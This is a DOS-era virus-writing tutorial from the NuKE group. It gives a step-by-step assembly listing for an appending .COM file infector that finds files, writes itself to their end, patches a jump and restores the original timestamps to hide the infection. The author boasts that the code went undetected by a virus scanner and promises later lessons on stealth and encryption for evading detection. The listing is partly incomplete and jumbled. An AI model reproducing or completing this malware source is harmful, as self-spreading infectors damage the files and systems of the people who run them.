****************************************** ** Constructing Kit on infecting .COM ** ** ** ** By Rock Steady/NuKE ** ****************************************** Well I must state my opinion that there are certainly WAY too many Overwriting Viruses out here. To help put a Stop to this I will try to explain to you a SIMPLE way to infect COM files at the END of the Program. This routine WORKS if you follow my steps correctly, and I've already used this in my `ParaSite ][' Virus. Anyhow this is a brief description what the ASM Source will do. 1. Find a .COM file in the current Directory 2. Save the Date and File's Attribute. 3. Save the First 3 Bytes in a Stack 4. Infect the File & restore new 3 bytes.. 5. Put the OLD date and File Attributes back on Beginning... ~~~~~~~~~~~~ ;---------------------------------------------------------------------- ; The Simple routine to Search for a .COM File... ;---------------------------------------------------------------------- com_files db "*.com",0 mov ah,4eh ;point to a *.COM file... mov dx,com_files mov cx,3 ;Attributes with ReadOnly or Hidden int 21h ;is A okay... cmp ax,12h ;Any files found? je exit ;If no Files found Exit... jmp found_file ; Instead of Exiting here you can make the Virus go and change dir and ; look for several other .com files else where... with the help of the ; path or simply searching for more ... found_file: mov di,[si+file] ;di points to the filename push si add si,file ;si points to filename... mov ax,offset 4300h ;get file Attributes... mov dx,si ;filename in dx.. int 21h mov file_attrib,cx ;Save file Attributes. file dw 0 ; Here we'll set the file attributes to nothing mov ax,offset 4301h ;To set file Attributes... mov cx,offset 0fffeh ;Set them to a Normal File mov dx,si ;filename... int 21h mov ax,offset 3d02h ;Open File to Read/Write. mov dx,si ;ASCIIZ filename int 21h jnb ok ;If file was open continue jmp put_old_attrib ; error happened restore old attribs ; and quit. ok: mov bx,ax mov ax,offset 5700h ;Get File Date & Time... int 21h mov old_time,cx ;Save old File Time... mov old_date,dx ;Save old File Date old_time db 0 old_date db 0 ; here we infect the file... but first we SAVE the first 3 bytes ; somewhere in our virus mov ah,3fh ;Read file... mov cx,3 ;Number of bytes to read mov dx,first_3 ;Save bytes in the buffer add dx,si ;Filename... int 21h cmp ax,3 ;Where 3 bytes read? jnz fix_file ;If not fix file like before and quit first_3 equ $ ; The First three bytes of the Original File! int 20h ; the virus is infected to. nop ; This moves the File pointer to the END of the file mov ax,offset 4202h mov cx,0 mov dx,0 int 21h mov cx,ax ;DX:AX is the FILESIZE! sub ax,3 ;subtract three because of file pointer add cx,offset c_len_y mov di,si sub di,offset c_len_x mov [di],cx ;Modifies the 2nd & 3rd bytes of program ; The writes our virus to the file mov ah,40h mov cx,virlength ;Virus Length mov dx,si ;File... sub dx,offset codelength ;Length of virus codes. int 21h cmp ax,offset virlength ;all bytes written? jnz fix_file ;If no fix file and quit ;Moves the file pointer to the beginning of file and write the ;3 bytes JMP at the beginning of the file mov ax,offset 4200h mov cx,0 mov dx,0 int 21h mov ah,40h ;Write to file... mov cx,3 ;# of bytes to write... mov dx,si ;File name... add dx,jump ;Point to the new JMP statement int 21h jump db 0e9h ;This is the JMP that will be put in the ;Begining of the file! ;Restore Old File Time & Date fix_file: mov dx,old_date ;Old File Date mov cx,old_time ;Old file Time... and cx,offset 0ffe0h ;Flat Attribs. mov ax,offset 5701h int 21h mov ah,3eh int 21h ;Close file... ; Here we'll restore the old file attributes... put_old_attrib: mov ax,offset 4301h mov cx,old_att ;old File Attributes. mov dx,si ;Filename... int 21h ;----------------------------- EnD ------------------------------------- Anyhow that's it... Simple no? This source was also used in my ParaSite ][ Virus that is STILL undetectable to date with Scanv85. Anyhow I even made it MORE simpler than my real sources that have to play with the file paths. Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks. Anyhow This works FINE with a Non-Resident Virus. Because a few statements would have to be edited for TSRs. Anyhow try to use this, it's small neat and fast. Anyhow Perhaps next issue I will develop a SIMPLE Ram-Resident virus that infects COMs and EXEs to be released into the next issue! Though I just release this sources for you to LEARN! Rather than putting you name on my virus and releasing another strain on work I worked Hard upon! Anyhow I should release a SIMPLE new Virus source for all you programmers out there! And I will even explain a few Stealth Technics like how to hide your program in memory right under the TOM. If there's Any Questions you want to know, please ask them I will answer them in the next [NukE] Releases... I may even release source codes on how to make an Algorithm Encryption method! I've developed one on my own, without the V2PX viruses sources... Anyhow it does the job and the formula I developed has an UNLIMITED amount of encryption methods! But since the virus codes have to be SMALL Like close to 2,000 bytes I will limit the formula to about 1,000 different combinations! Rock Steady NukE / Viral Development Reaseacher -PeAcE-